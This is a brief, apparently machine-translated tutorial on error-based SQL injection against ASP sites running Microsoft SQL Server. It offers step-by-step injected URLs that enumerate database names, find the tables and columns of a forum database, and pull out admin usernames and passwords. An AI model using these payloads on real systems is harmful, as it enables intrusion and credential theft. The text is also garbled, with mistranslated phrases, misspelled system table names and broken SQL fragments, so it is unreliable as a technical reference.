SQL INJECTION is flexible, the injected statement is different, and only the general steps of the branches are provided, I hope to help you.
1: Out of all library names. Http://www.**.com/***.asp? Id = 1 and 0 <> (select count (*) from master.dbo.sysdatabasees where name> 1 and NAME DBID = 6) Submit DBID = 7, 8, 9 .... Get more database name
2: There is a BBS database in the outburs library, submit the following statement: http://www.***.com/jump.asp? Id = 1 and 0 <> (SELECT TOP 1 Name from BBS .dbo.sysObjects where xtype = 'u') Come get a table to assume admin Submitted: http://www.***.com/jump.asp? id = 1 and 0 <> (SELECT TOP 1 Name from BBS .dbo.sysObjects where xtype = 'u' and name not in ('admin')) to get other tables.
3: Fields in the outbraction submission: http://www.***.com/***.asp? Id = 1 and 0 <> (Select Count (*) from bbs.dbo.sysobjects where xtype = 'U' and name = 'admin' and uid> (STR (ID))) Get UID value assumption to 18779569 UID = ID Submit: http://www.***.com/***.asp? Id = 1 and 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569) Get a field of ADMIN, assume that the user_id 4: Froky Username, Password, etc. : Http://www.***.com/***.asp? Id = 1 and 0 <(Select user_id from bbs.dbo.admin where username> 1) You can get a password in order. . . . .